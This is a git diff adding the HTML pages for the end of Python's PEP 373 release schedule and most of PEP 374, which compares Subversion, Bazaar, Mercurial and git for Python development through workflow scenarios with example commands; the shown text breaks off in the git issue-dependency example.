  • 2.7.11 2015-12-05
  • +
  • 2.7.12 2016-06-25
  • +
  • 2.7.13rc1 2016-12-03
  • +
  • 2.7.13 2016-12-17
  • +
  • 2.7.14rc1 2017-08-26
  • +
  • 2.7.14 2017-09-16
  • +
  • 2.7.15rc1 2018-04-14
  • +
  • 2.7.15 2018-05-01
  • +
  • 2.7.16rc 2019-02-16
  • +
  • 2.7.16 2019-03-02
  • +
  • 2.7.17rc1 2019-10-05
  • +
  • 2.7.17 2019-10-19
  • +
  • 2.7.18rc1 2020-04-04
  • +
  • 2.7.18 2020-04-20
  • +
+
+
+

2.7.0 Release Schedule

+

The release schedule for 2.7.0 was:

+
    +
  • 2.7 alpha 1 2009-12-05
  • +
  • 2.7 alpha 2 2010-01-09
  • +
  • 2.7 alpha 3 2010-02-06
  • +
  • 2.7 alpha 4 2010-03-06
  • +
  • 2.7 beta 1 2010-04-03
  • +
  • 2.7 beta 2 2010-05-08
  • +
  • 2.7 rc1 2010-06-05
  • +
  • 2.7 rc2 2010-06-19
  • +
  • 2.7 final 2010-07-03
  • +
+
+
+

Possible features for 2.7

+

Nothing here. [Note that a moratorium on core language changes is in effect.]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0373.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0374/index.html b/pep-0374/index.html new file mode 100644 index 00000000000..1848a70dd8e --- /dev/null +++ b/pep-0374/index.html @@ -0,0 +1,1743 @@ PEP 374 – Choosing a distributed VCS for the Python project | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 374 – Choosing a distributed VCS for the Python project

+
+
Author:
+
Brett Cannon <brett at python.org>, +Stephen J. Turnbull <stephen at xemacs.org>, +Alexandre Vassalotti <alexandre at peadrop.com>, +Barry Warsaw <barry at python.org>, +Dirkjan Ochtman <dirkjan at ochtman.nl>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
07-Nov-2008
+
Post-History:
+
07-Nov-2008, +22-Jan-2009
+
+
+
+
Table of Contents +
+
+

Rationale

+

Python has been using a centralized version control system (VCS; +first CVS, now Subversion) for years to great effect. Having a master +copy of the official version of Python provides people with a single +place to always get the official Python source code. It has also +allowed for the storage of the history of the language, mostly for +help with development, but also for posterity. And of course the V in +VCS is very helpful when developing.

+

But a centralized version control system has its drawbacks. First and +foremost, in order to have the benefits of version control with +Python in a seamless fashion, one must be a “core developer” (i.e. +someone with commit privileges on the master copy of Python). People +who are not core developers but who wish to work with Python’s +revision tree, e.g. anyone writing a patch for Python or creating a +custom version, do not have direct tool support for revisions. This +can be quite a limitation, since these non-core developers cannot +easily do basic tasks such as reverting changes to a previously +saved state, creating branches, publishing one’s changes with full +revision history, etc. For non-core developers, the last safe tree +state is one the Python developers happen to set, and this prevents +safe development. This second-class citizenship is a hindrance to +people who wish to contribute to Python with a patch of any +complexity and want a way to incrementally save their progress to +make their development lives easier.

+

There is also the issue of having to be online to be able to commit +one’s work. Because centralized VCSs keep a central copy that stores +all revisions, one must have Internet access in order for their +revisions to be stored; no Net, no commit. This can be annoying if +you happen to be traveling and lack any Internet. There is also the +situation of someone wishing to contribute to Python but having a +bad Internet connection where committing is time-consuming and +expensive and it might work out better to do it in a single step.

+

Another drawback to a centralized VCS is that a common use case is for a developer to revise patches in response to review comments. This is more difficult with a centralized model because there’s no place to contain intermediate work. It’s either all checked in or none of it is checked in. In the centralized VCS, it’s also very difficult to track changes to the trunk as they are committed, while you’re working on your feature or bug fix branch. This increases the risk that such branches will grow stale, out-dated, or that merging them into the trunk will generate too many conflicts to be easily resolved.

+

Lastly, there is the issue of maintenance of Python. At any one time +there is at least one major version of Python under development (at +the time of this writing there are two). For each major version of +Python under development there is at least the maintenance version +of the last minor version and the in-development minor version (e.g. +with 2.6 just released, that means that both 2.6 and 2.7 are being +worked on). Once a release is done, a branch is created between the +code bases where changes in one version do not (but could) belong in +the other version. As of right now there is no natural support for +this branch in time in central VCSs; you must use tools that +simulate the branching. Tracking merges is similarly painful for +developers, as revisions often need to be merged between four active +branches (e.g. 2.6 maintenance, 3.0 maintenance, 2.7 development, +3.1 development). In this case, VCSs such as Subversion only handle +this through arcane third party tools.

+

Distributed VCSs (DVCSs) solve all of these problems. While one can +keep a master copy of a revision tree, anyone is free to copy that +tree for their own use. This gives everyone the power to commit +changes to their copy, online or offline. It also more naturally +ties into the idea of branching in the history of a revision tree +for maintenance and the development of new features bound for +Python. DVCSs also provide a great many additional features that +centralized VCSs don’t or can’t provide.

+

This PEP explores the possibility of changing Python’s use of Subversion +to any of the currently popular DVCSs, in order to gain +the benefits outlined above. This PEP does not guarantee that a switch +to a DVCS will occur at the conclusion of this PEP. It is quite +possible that no clear winner will be found and that svn will continue +to be used. If this happens, this PEP will be revisited and revised in +the future as the state of DVCSs evolves.

+
+
+

Terminology

+

Agreeing on a common terminology is surprisingly difficult, +primarily because each VCS uses these terms when describing subtly +different tasks, objects, and concepts. Where possible, we try to +provide a generic definition of the concepts, but you should consult +the individual system’s glossaries for details. Here are some basic +references for terminology, from some of the standard web-based +references on each VCS. You can also refer to glossaries for each +DVCS:

+ +
+
branch
A line of development; a collection of revisions, ordered by +time.
+
checkout/working copy/working tree
A tree of code the developer can edit, linked to a branch.
+
index
A “staging area” where a revision is built (unique to git).
+
repository
A collection of revisions, organized into branches.
+
clone
A complete copy of a branch or repository.
+
commit
To record a revision in a repository.
+
merge
Applying all the changes and history from one branch/repository +to another.
+
pull
To update a checkout/clone from the original branch/repository, which can be remote or local.
+
push/publish
To copy a revision, and all revisions it depends on, from one repository to another.
+
cherry-pick
To merge one or more specific revisions from one branch to +another, possibly in a different repository, possibly without its +dependent revisions.
+
rebase
To “detach” a branch, and move it to a new branch point; move +commits to the beginning of a branch instead of where they +happened in time.
+
+
+
+

Typical Workflow

+

At the moment, the typical workflow for a Python core developer is:

+
    +
  • Edit code in a checkout until it is stable enough to commit/push.
  • +
  • Commit to the master repository.
  • +
+

It is a rather simple workflow, but it has drawbacks. For one, +because any work that involves the repository takes time thanks to +the network, commits/pushes tend to not necessarily be as atomic as +possible. There is also the drawback of there not being a +necessarily cheap way to create new checkouts beyond a recursive +copy of the checkout directory.

+

A DVCS would lead to a workflow more like this:

+
    +
  • Branch off of a local clone of the master repository.
  • +
  • Edit code, committing in atomic pieces.
  • +
  • Merge the branch into the mainline, and
  • +
  • Push all commits to the master repository.
  • +
+

While there are more possible steps, the workflow is much more +independent of the master repository than is currently possible. By +being able to commit locally at the speed of your disk, a core +developer is able to do atomic commits much more frequently, +minimizing having commits that do multiple things to the code. Also +by using a branch, the changes are isolated (if desired) from other +changes being made by other developers. Because branches are cheap, +it is easy to create and maintain many smaller branches that address +one specific issue, e.g. one bug or one new feature. More +sophisticated features of DVCSs allow the developer to more easily +track long running development branches as the official mainline +progresses.

+
+
+

Contenders

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameShort NameVersion2.x Trunk Mirror3.x Trunk Mirror
Bazaarbzr1.12http://code.python.org/python/trunkhttp://code.python.org/python/3.0
Mercurialhg1.2.0http://code.python.org/hg/trunk/http://code.python.org/hg/branches/py3k/
gitN/A1.6.1git://code.python.org/python/trunkgit://code.python.org/python/branches/py3k
+

This PEP does not consider darcs, arch, or monotone. The main +problem with these DVCSs is that they are simply not popular enough +to bother supporting when they do not provide some very compelling +features that the other DVCSs provide. Arch and darcs also have +significant performance problems which seem unlikely to be addressed +in the near future.

+
+
+

Interoperability

+

For those who have already decided which DVCSs they want to use, and +are willing to maintain local mirrors themselves, all three DVCSs +support interchange via the git “fast-import” changeset format. git +does so natively, of course, and native support for Bazaar is under +active development, and getting good early reviews as of mid-February +2009. Mercurial has idiosyncratic support for importing via its hg +convert command, and third-party fast-import support is available +for exporting. Also, the Tailor tool supports automatic maintenance +of mirrors based on an official repository in any of the candidate +formats with a local mirror in any format.

+
+
+

Usage Scenarios

+

Probably the best way to help decide on whether/which DVCS should +replace Subversion is to see what it takes to perform some +real-world usage scenarios that developers (core and non-core) have +to work with. Each usage scenario outlines what it is, a bullet list +of what the basic steps are (which can vary slightly per VCS), and +how to perform the usage scenario in the various VCSs +(including Subversion).

+

Each VCS had a single author in charge of writing implementations +for each scenario (unless otherwise noted).

+ + + + + + + + + + + + + + + + + + + + +
NameVCS
Brettsvn
Barrybzr
Alexandrehg
Stephengit
+
+

Initial Setup

+

Some DVCSs have some perks if you do some initial setup upfront. +This section covers what can be done before any of the usage +scenarios are run in order to take better advantage of the tools.

+

All of the DVCSs support configuring your project identification. +Unlike the centralized systems, they use your email address to +identify your commits. (Access control is generally done by +mechanisms external to the DVCS, such as ssh or console login). +This identity may be associated with a full name.

+

All of the DVCSs will query the system to get some approximation to +this information, but that may not be what you want. They also +support setting this information on a per-user basis, and on a +per-project basis. Convenience commands to set these attributes vary, +but all allow direct editing of configuration files.

+

Some VCSs support end-of-line (EOL) conversions on checkout/checkin.

+
+

svn

+

None required, but it is recommended you follow the +guidelines +in the dev FAQ.

+
+
+

bzr

+

No setup is required, but for much quicker and space-efficient local +branching, you should create a shared repository to hold all your +Python branches. A shared repository is really just a parent +directory containing a .bzr directory. When bzr commits a revision, +it searches from the local directory on up the file system for a .bzr +directory to hold the revision. By sharing revisions across multiple +branches, you cut down on the amount of disk space used. Do this:

+
cd ~/projects
+bzr init-repo python
+cd python
+
+
+

Now, all your Python branches should be created inside of +~/projects/python.

+

There are also some settings you can put in your ~/.bazaar/bazaar.conf and ~/.bazaar/locations.conf files to set up defaults for interacting with Python code. None of them are required, although some are recommended. E.g., I would suggest GPG-signing all commits, but that might be too high a barrier for developers. Also, you can set up default push locations depending on where you want to push branches by default. If you have write access to the master branches, that push location could be code.python.org. Otherwise, it might be a free Bazaar code hosting service such as Launchpad. If Bazaar is chosen, we should decide what the policies and recommendations are.

+

At a minimum, I would set up your email address:

+
bzr whoami "Firstname Lastname <email.address@example.com>"
+
+
+

As with hg and git below, there are ways to set your email address (or really, just about any parameter) on a per-repository basis. You do this with settings in your $HOME/.bazaar/locations.conf file, which has an ini-style format, as do the configuration files of the other DVCSs. See the Bazaar documentation for details, which mostly aren’t relevant for this discussion.

+
+
+

hg

+

Minimally, you should set your user name. To do so, create the file +.hgrc in your home directory and add the following:

+
[ui]
+username = Firstname Lastname <email.address@example.com>
+
+
+

If you are using Windows and your tools do not support Unix-style newlines, +you can enable automatic newline translation by adding to your configuration:

+
[extensions]
+win32text =
+
+
+

These options can also be set locally to a given repository by +customizing <repo>/.hg/hgrc, instead of ~/.hgrc.
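For example, a minimal sketch of setting the same option for just one repository (the repository path is hypothetical):

cd /path/to/python/repository
cat >> .hg/hgrc << EOF
[ui]
username = Firstname Lastname <email.address@example.com>
EOF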

+
+
+

git

+

None needed. However, git supports a number of features that can +smooth your work, with a little preparation. git supports setting +defaults at the workspace, user, and system levels. The system +level is out of scope of this PEP. The user configuration file is +$HOME/.gitconfig on Unix-like systems, and the workspace +configuration file is $REPOSITORY/.git/config.

+

You can use the git-config tool to set preferences for user.name and user.email either globally (for your system login account) or locally (to a given git working copy), or you can edit the configuration files (which have the same format as shown in the Mercurial section above):

+
# my full name doesn't change
+# note "--global" flag means per user
+# (system-wide configuration is set with "--system")
+git config --global user.name 'Firstname Lastname'
+# but use my Pythonic email address
+cd /path/to/python/repository
+git config user.email email.address@python.example.com
+
+
+

If you are using Windows, you probably want to set the core.autocrlf and core.safecrlf preferences to true using git-config:

+
# check out files with CRLF line endings rather than Unix-style LF only
+git config --global core.autocrlf true
+# scream if a transformation would be ambiguous
+# (eg, a working file contains both naked LF and CRLF)
+# and check them back in with the reverse transformation
+git config --global core.safecrlf true
+
+
+

Although the repository will usually contain a .gitignore file specifying file names that should rarely if ever be registered in the VCS, you may have personal conventions (e.g., always editing log messages in a temporary file named “.msg”) that you may wish to specify:

+
# tell git where my personal ignores are
+git config --global core.excludesfile ~/.gitignore
+# I use .msg for my long commit logs, and Emacs makes backups in
+# files ending with ~
+# these are globs, not regular expressions
+echo '*~' >> ~/.gitignore
+echo '.msg' >> ~/.gitignore
+
+
+

If you use multiple branches, as with the other VCSs, you can save a lot of space by putting all objects in a common object store. This also can save download time, if the origins of the branches were in different repositories, because objects are shared across branches in your repository even if they were not present in the upstream repositories. git is very space- and time-efficient and applies a number of optimizations automatically, so this configuration is optional; a brief sketch of one approach follows.
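Assuming you already have a local clone of the trunk, one possible approach is git clone --reference, which borrows objects from an existing local repository instead of re-downloading them (a sketch; the URLs are taken from the mirror table above):

# clone the mainline once
git clone git://code.python.org/python/trunk trunk
# reuse its objects when cloning the 3.x branch
git clone --reference trunk git://code.python.org/python/branches/py3k py3k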

+
+
+
+

One-Off Checkout

+

As a non-core developer, I want to create and publish a one-off patch +that fixes a bug, so that a core developer can review it for +inclusion in the mainline.

+
    +
  • Checkout/branch/clone trunk.
  • +
  • Edit some code.
  • +
  • Generate a patch (based on what is best supported by the VCS, e.g. +branch history).
  • +
  • Receive reviewer comments and address the issues.
  • +
  • Generate a second patch for the core developer to commit.
  • +
+
+

svn

+
svn checkout http://svn.python.org/projects/python/trunk
+cd trunk
+# Edit some code.
+echo "The cake is a lie!" > README
+# Since svn lacks support for local commits, we fake it with patches.
+svn diff >> commit-1.diff
+svn diff >> patch-1.diff
+# Upload the patch-1 to bugs.python.org.
+# Receive reviewer comments.
+# Edit some code.
+echo "The cake is real!" > README
+# Since svn lacks support for local commits, we fake it with patches.
+svn diff >> commit-2.diff
+svn diff >> patch-2.diff
+# Upload patch-2 to bugs.python.org
+
+
+
+
+

bzr

+
bzr branch http://code.python.org/python/trunk
+cd trunk
+# Edit some code.
+bzr commit -m 'Stuff I did'
+bzr send -o bundle
+# Upload bundle to bugs.python.org
+# Receive reviewer comments
+# Edit some code
+bzr commit -m 'Respond to reviewer comments'
+bzr send -o bundle
+# Upload updated bundle to bugs.python.org
+
+
+

The bundle file is like a super-patch. It can be read by patch(1), but it contains additional metadata so that it can be fed to bzr merge to produce a fully usable branch complete with history. See the Patch Review section below.

+
+
+

hg

+
hg clone http://code.python.org/hg/trunk
+cd trunk
+# Edit some code.
+hg commit -m "Stuff I did"
+hg outgoing -p > fixes.patch
+# Upload patch to bugs.python.org
+# Receive reviewer comments
+# Edit some code
+hg commit -m "Address reviewer comments."
+hg outgoing -p > additional-fixes.patch
+# Upload patch to bugs.python.org
+
+
+

While hg outgoing does not have the flag for it, most Mercurial commands support git’s extended patch format through a --git option. This can be set in one’s .hgrc file so that all commands that generate a patch use the extended format.
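For example, a sketch of that configuration, added to one’s ~/.hgrc:

[diff]
git = True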

+
+
+

git

+

The patches could be created with +git diff master > stuff-i-did.patch, too, but +git format-patch | git am knows some tricks +(empty files, renames, etc) that ordinary patch can’t handle. git +grabs “Stuff I did” out of the commit message to create the file +name 0001-Stuff-I-did.patch. See Patch Review below for a +description of the git-format-patch format.

+
# Get the mainline code.
+git clone git://code.python.org/python/trunk
+cd trunk
+# Edit some code.
+git commit -a -m 'Stuff I did.'
+# Create patch for my changes (i.e, relative to master).
+git format-patch master
+git tag stuff-v1
+# Upload 0001-Stuff-I-did.patch to bugs.python.org.
+# Time passes ... receive reviewer comments.
+# Edit more code.
+git commit -a -m 'Address reviewer comments.'
+# Make an add-on patch to apply on top of the original.
+git format-patch stuff-v1
+# Upload 0001-Address-reviewer-comments.patch to bugs.python.org.
+
+
+
+
+
+

Backing Out Changes

+

As a core developer, I want to undo a change that was not ready for +inclusion in the mainline.

+
    +
  • Back out the unwanted change.
  • +
  • Push patch to server.
  • +
+
+

svn

+
# Assume the change to revert is in revision 40
+svn merge -c -40 .
+# Resolve conflicts, if any.
+svn commit -m "Reverted revision 40"
+
+
+
+
+

bzr

+
# Assume the change to revert is in revision 40
+bzr merge -r 40..39
+# Resolve conflicts, if any.
+bzr commit -m "Reverted revision 40"
+
+
+

Note that if the change you want to revert is the last one that was made, you can just use bzr uncommit.
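For example, a minimal sketch of that last-commit case:

# remove the last revision from the branch; the working tree is left alone
bzr uncommit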

+
+
+

hg

+
# Assume the change to revert is in revision 9150dd9c6d30
+hg backout --merge -r 9150dd9c6d30
+# Resolve conflicts, if any.
+hg commit -m "Reverted changeset 9150dd9c6d30"
+hg push
+
+
+

Note that you can use hg rollback and hg strip to revert changes you committed in your local repository but have not yet pushed to other repositories.
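For illustration, a rough sketch (hg strip comes from the bundled mq extension, which must be enabled; the changeset ID is reused from the example above):

# undo the most recent commit or pull in the local repository
hg rollback
# or remove a specific unpushed changeset entirely
hg strip 9150dd9c6d30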

+
+
+

git

+
# Assume the change to revert is the grandfather of a revision tagged "newhotness".
+git revert newhotness~2
+# Resolve conflicts if any.  If there are no conflicts, the commit
+# will be done automatically by "git revert", which prompts for a log.
+git commit -m "Reverted changeset 9150dd9c6d30."
+git push
+
+
+
+
+
+

Patch Review

+

As a core developer, I want to review patches submitted by other +people, so that I can make sure that only approved changes are added +to Python.

+

Core developers have to review patches as submitted by other people. +This requires applying the patch, testing it, and then tossing away +the changes. The assumption can be made that a core developer already +has a checkout/branch/clone of the trunk.

+
    +
  • Branch off of trunk.
  • +
  • Apply patch w/o any comments as generated by the patch submitter.
  • +
  • Push patch to server.
  • +
  • Delete now-useless branch.
  • +
+
+

svn

+

Subversion does not fit into this development style very well, as there is no such thing as a “branch” as defined in this PEP. Instead, a developer either needs to create another checkout for testing a patch or create a branch on the server. Up to this point, core developers have not taken the “branch on the server” approach to dealing with individual patches. For this scenario the assumption will be that the developer creates a local checkout of the trunk to work with:

+
cp -r trunk issue0000
+cd issue0000
+patch -p0 < __patch__
+# Review patch.
+svn commit -m "Some patch."
+cd ..
+rm -r issue0000
+
+
+

Another option is to have only a single checkout running at any one time and to use svn diff along with svn revert -R to store away independent changes you may have made; a sketch follows.
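A sketch of that single-checkout approach (the stash file name is arbitrary):

# save the current changes, then restore a pristine tree
svn diff > stash.diff
svn revert -R .
# ... apply and review the submitted patch, commit it ...
# reapply the saved changes afterwards
patch -p0 < stash.diff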

+
+
+

bzr

+
bzr branch trunk issueNNNN
+# Download `patch` bundle from Roundup
+bzr merge patch
+# Review patch
+bzr commit -m'Patch NNNN by So N. So' --fixes python:NNNN
+bzr push bzr+ssh://me@code.python.org/trunk
+rm -rf ../issueNNNN
+
+
+

Alternatively, since you’re probably going to commit these changes to the trunk, you could just do a checkout. That would give you a local working tree while the branch (i.e. all revisions) would continue to live on the server. This is similar to the svn model and might allow you to more quickly review the patch. There’s no need for the push in this case:

+
bzr checkout trunk issueNNNN
+# Download `patch` bundle from Roundup
+bzr merge patch
+# Review patch
+bzr commit -m'Patch NNNN by So N. So' --fixes python:NNNN
+rm -rf ../issueNNNN
+
+
+
+
+

hg

+
hg clone trunk issue0000
+cd issue0000
+# If the patch was generated using hg export, the user name of the
+# submitter is automatically recorded. Otherwise,
+# use hg import --no-commit submitted.diff and commit with
+# hg commit -u "Firstname Lastname <email.address@example.com>"
+hg import submitted.diff
+# Review patch.
+hg push ssh://alexandre@code.python.org/hg/trunk/
+
+
+
+
+

git

+

We assume a patch created by git-format-patch. This is a Unix mbox file containing one or more patches, each formatted as an RFC 2822 message. git-am interprets each message as a commit as follows: the author of the patch is taken from the From: header and the date from the Date: header. The commit log is created by concatenating the content of the subject line, a blank line, and the message body up to the start of the patch:

+
cd trunk
+# Create a branch in case we don't like the patch.
+# This checkout takes zero time, since the workspace is left in
+# the same state as the master branch.
+git checkout -b patch-review
+# Download patch from bugs.python.org to submitted.patch.
+git am < submitted.patch
+# Review and approve patch.
+# Merge into master and push.
+git checkout master
+git merge patch-review
+git push
+
+
+
+
+
+

Backport

+

As a core developer, I want to apply a patch to 2.6, 2.7, 3.0, and 3.1 so that I can fix a problem in all four versions.

+

Thanks to always having the cutting-edge and the latest release +version under development, Python currently has four branches being +worked on simultaneously. That makes it important for a change to +propagate easily through various branches.

+
+

svn

+

Because of Python’s use of svnmerge, changes start with the trunk +(2.7) and then get merged to the release version of 2.6. To get the +change into the 3.x series, the change is merged into 3.1, fixed up, +and then merged into 3.0 (2.7 -> 2.6; 2.7 -> 3.1 -> 3.0).

+

This is in contrast to a port-forward strategy where the patch would +have been added to 2.6 and then pulled forward into newer versions +(2.6 -> 2.7 -> 3.0 -> 3.1).

+
# Assume patch applied to 2.7 in revision 0000.
+cd release26-maint
+svnmerge merge -r 0000
+# Resolve merge conflicts and make sure patch works.
+svn commit -F svnmerge-commit-message.txt  # revision 0001.
+cd ../py3k
+svnmerge merge -r 0000
+# Same as for 2.6, except Misc/NEWS changes are reverted.
+svn revert Misc/NEWS
+svn commit -F svnmerge-commit-message.txt  # revision 0002.
+cd ../release30-maint
+svnmerge merge -r 0002
+svn commit -F svnmerge-commit-message.txt  # revision 0003.
+
+
+
+
+

bzr

+

Bazaar is pretty straightforward here, since it supports cherry +picking revisions manually. In the example below, we could have +given a revision id instead of a revision number, but that’s usually +not necessary. Martin Pool suggests “We’d generally recommend doing +the fix first in the oldest supported branch, and then merging it +forward to the later releases.”:

+
# Assume patch applied to 2.7 in revision 0000
+cd release26-maint
+bzr merge ../trunk -c 0000
+# Resolve conflicts and make sure patch works
+bzr commit -m 'Back port patch NNNN'
+bzr push bzr+ssh://me@code.python.org/trunk
+cd ../py3k
+bzr merge ../trunk -c 0000
+# Same as for 2.6 except Misc/NEWS changes are reverted
+bzr revert Misc/NEWS
+bzr commit -m 'Forward port patch NNNN'
+bzr push bzr+ssh://me@code.python.org/py3k
+
+
+
+
+

hg

+

Mercurial, like the other DVCSs, does not provide good support for the current workflow used by Python core developers to backport patches. Right now, bug fixes are first applied to the development mainline (i.e., trunk), then back-ported to the maintenance branches and forward-ported, as necessary, to the py3k branch. This workflow requires the ability to cherry-pick individual changes. Mercurial’s transplant extension provides this ability. Here is an example of the scenario using this workflow:

+
cd release26-maint
+# Assume patch applied to 2.7 in revision 0000
+hg transplant -s ../trunk 0000
+# Resolve conflicts, if any.
+cd ../py3k
+hg pull ../trunk
+hg merge
+hg revert Misc/NEWS
+hg commit -m "Merged trunk"
+hg push
+
+
+

In the above example, transplant acts much like the current svnmerge command. When transplant is invoked without a revision, the command launches an interactive loop useful for transplanting multiple changes. Another useful feature is the --filter option, which can be used to modify changesets programmatically (e.g., it could be used for removing changes to Misc/NEWS automatically).

+

As an alternative to the traditional workflow, we could avoid transplanting changesets by committing bug fixes to the oldest supported release, then merging these fixes upward into the more recent branches.

+
cd release25-maint
+hg import fix_some_bug.diff
+# Review patch and run test suite. Revert if failure.
+hg push
+cd ../release26-maint
+hg pull ../release25-maint
+hg merge
+# Resolve conflicts, if any. Then, review patch and run test suite.
+hg commit -m "Merged patches from release25-maint."
+hg push
+cd ../trunk
+hg pull ../release26-maint
+hg merge
+# Resolve conflicts, if any, then review.
+hg commit -m "Merged patches from release26-maint."
+hg push
+
+
+

Although this approach makes the history non-linear and slightly more difficult to follow, it encourages fixing bugs across all supported releases. Furthermore, it scales better when there are many changes to backport, because we do not need to seek out the specific revision IDs to merge.

+
+
+

git

+

In git I would have a workspace which contains all of +the relevant master repository branches. git cherry-pick doesn’t +work across repositories; you need to have the branches in the same +repository.

+
# Assume patch applied to 2.7 in revision release27~3 (4th patch back from tip).
+cd integration
+git checkout release26
+git cherry-pick release27~3
+# If there are conflicts, resolve them, and commit those changes.
+# git commit -a -m "Resolve conflicts."
+# Run test suite. If fixes are necessary, record as a separate commit.
+# git commit -a -m "Fix code causing test failures."
+git checkout master
+git cherry-pick release27~3
+# Do any conflict resolution and test failure fixups.
+# Revert Misc/NEWS changes.
+git checkout HEAD^ -- Misc/NEWS
+git commit -m 'Revert cherry-picked Misc/NEWS changes.' Misc/NEWS
+# Push both ports.
+git push origin release26 master
+
+
+

If you are regularly merging (rather than cherry-picking) from a +given branch, then you can block a given commit from being +accidentally merged in the future by merging, then reverting it. +This does not prevent a cherry-pick from pulling in the unwanted +patch, and this technique requires blocking everything that you don’t +want merged. I’m not sure if this differs from svn on this point.

+
cd trunk
+# Merge in the alpha tested code.
+git merge experimental-branch
+# We don't want the 3rd-to-last commit from the experimental-branch,
+# and we don't want it to ever be merged.
+# The notation "^N" means Nth parent of the current commit. Thus HEAD^2^1^1
+# means the first parent of the first parent of the second parent of HEAD.
+git revert HEAD^2^1^1
+# Propagate the merge and the prohibition to the public repository.
+git push
+
+
+
+
+
+

Coordinated Development of a New Feature

+

Sometimes core developers end up working on a major feature with +several developers. As a core developer, I want to be able to +publish feature branches to a common public location so that I can +collaborate with other developers.

+

This requires creating a branch on a server that other developers +can access. All of the DVCSs support creating new repositories on +hosts where the developer is already able to commit, with +appropriate configuration of the repository host. This is +similar in concept to the existing sandbox in svn, although details +of repository initialization may differ.

+

For non-core developers, there are various more-or-less public-access +repository-hosting services. +Bazaar has +Launchpad, +Mercurial has +bitbucket.org, +and git has +GitHub. +All also have easy-to-use +CGI interfaces for developers who maintain their own servers.

+
    +
  • Branch trunk.
  • +
  • Pull from branch on the server.
  • +
  • Pull from trunk.
  • +
  • Push merge to trunk.
  • +
+
+

svn

+
# Create branch.
+svn copy svn+ssh://pythondev@svn.python.org/python/trunk svn+ssh://pythondev@svn.python.org/python/branches/NewHotness
+svn checkout svn+ssh://pythondev@svn.python.org/python/branches/NewHotness
+cd NewHotness
+svnmerge init
+svn commit -m "Initialize svnmerge."
+# Pull in changes from other developers.
+svn update
+# Pull in trunk and merge to the branch.
+svnmerge merge
+svn commit -F svnmerge-commit-message.txt
+
+
+

This scenario is incomplete, as the decision on which DVCS to go with was made before the work was complete.
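Since the DVCS write-ups were never completed, here is a rough sketch of how this scenario might look in Mercurial (the server paths are hypothetical):

# Branch trunk and publish the branch by cloning it up to the server.
hg clone http://code.python.org/hg/trunk/ NewHotness
cd NewHotness
hg clone . ssh://me@code.python.org/hg/NewHotness
# Pull in changes from other developers and merge them.
hg pull ssh://me@code.python.org/hg/NewHotness
hg merge
hg commit -m "Merged collaborator changes."
# Pull in trunk, merge, and eventually push the merge to the trunk.
hg pull http://code.python.org/hg/trunk/
hg merge
hg commit -m "Merged trunk."
hg push ssh://me@code.python.org/hg/trunk/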

+
+
+
+

Separation of Issue Dependencies

+

Sometimes, while working on an issue, it becomes apparent that the +problem being worked on is actually a compound issue of various +smaller issues. Being able to take the current work and then begin +working on a separate issue is very helpful to separate out issues +into individual units of work instead of compounding them into a +single, large unit.

+
    +
  • Create a branch A (e.g. urllib has a bug).
  • +
  • Edit some code.
  • +
  • Create a new branch B that branch A depends on (e.g. the urllib +bug exposes a socket bug).
  • +
  • Edit some code in branch B.
  • +
  • Commit branch B.
  • +
  • Edit some code in branch A.
  • +
  • Commit branch A.
  • +
  • Clean up.
  • +
+
+

svn

+

To make up for svn’s lack of cheap branching, it has a changelist +option to associate a file with a single changelist. This is not as +powerful as being able to associate at the commit level. There is +also no way to express dependencies between changelists.

+
cp -r trunk issue0000
+cd issue0000
+# Edit some code.
+echo "The cake is a lie!" > README
+svn changelist A README
+# Edit some other code.
+echo "I own Python!" > LICENSE
+svn changelist B LICENSE
+svn ci -m "Tell it how it is." --changelist B
+# Edit changelist A some more.
+svn ci -m "Speak the truth." --changelist A
+cd ..
+rm -rf issue0000
+
+
+
+
+

bzr

+

Here’s an approach that uses bzr shelf (now a standard part of bzr) +to squirrel away some changes temporarily while you take a detour to +fix the socket bugs.

+
bzr branch trunk bug-0000
+cd bug-0000
+# Edit some code. Dang, we need to fix the socket module.
+bzr shelve --all
+# Edit some code.
+bzr commit -m "Socket module fixes"
+# Detour over, now resume fixing urllib
+bzr unshelve
+# Edit some code
+
+
+

Another approach uses the loom plugin. Looms can +greatly simplify working on dependent branches because they +automatically take care of the stacking dependencies for you. +Imagine looms as a stack of dependent branches (called “threads” in +loom parlance), with easy ways to move up and down the stack of +threads, merge changes up the stack to descendant threads, create +diffs between threads, etc. Occasionally, you may need or want to +export your loom threads into separate branches, either for review +or commit. Higher threads incorporate all the changes in the lower +threads, automatically.

+
bzr branch trunk bug-0000
+cd bug-0000
+bzr loomify --base trunk
+bzr create-thread fix-urllib
+# Edit some code. Dang, we need to fix the socket module first.
+bzr commit -m "Checkpointing my work so far"
+bzr down-thread
+bzr create-thread fix-socket
+# Edit some code
+bzr commit -m "Socket module fixes"
+bzr up-thread
+# Manually resolve conflicts if necessary
+bzr commit -m 'Merge in socket fixes'
+# Edit me some more code
+bzr commit -m "Now that socket is fixed, complete the urllib fixes"
+bzr record done
+
+
+

For bonus points, let’s say someone else fixes the socket module in +exactly the same way you just did. Perhaps this person even grabbed your +fix-socket thread and applied just that to the trunk. You’d like to +be able to merge their changes into your loom and delete your +now-redundant fix-socket thread.

+
bzr down-thread trunk
+# Get all new revisions to the trunk. If you've done things
+# correctly, this will succeed without conflict.
+bzr pull
+bzr up-thread
+# See? The fix-socket thread is now identical to the trunk
+bzr commit -m 'Merge in trunk changes'
+bzr diff -r thread: | wc -l # returns 0
+bzr combine-thread
+bzr up-thread
+# Resolve any conflicts
+bzr commit -m 'Merge trunk'
+# Now our top-thread has an up-to-date trunk and just the urllib fix.
+
+
+
+
+

hg

+

One approach is to use the shelve extension; this extension is not included +with Mercurial, but it is easy to install. With shelve, you can select changes +to put temporarily aside.

+
hg clone trunk issue0000
+cd issue0000
+# Edit some code (e.g. urllib).
+hg shelve
+# Select changes to put aside
+# Edit some other code (e.g. socket).
+hg commit
+hg unshelve
+# Complete initial fix.
+hg commit
+cd ../trunk
+hg pull ../issue0000
+hg merge
+hg commit
+rm -rf ../issue0000
+
+
+

There are several other ways to approach this scenario with Mercurial. Alexander Solovyov presented a few alternative approaches on Mercurial’s mailing list.

+
+
+

git

+
cd trunk
+# Edit some code in urllib.
+# Discover a bug in socket, want to fix that first.
+# So save away our current work.
+git stash
+# Edit some code, commit some changes.
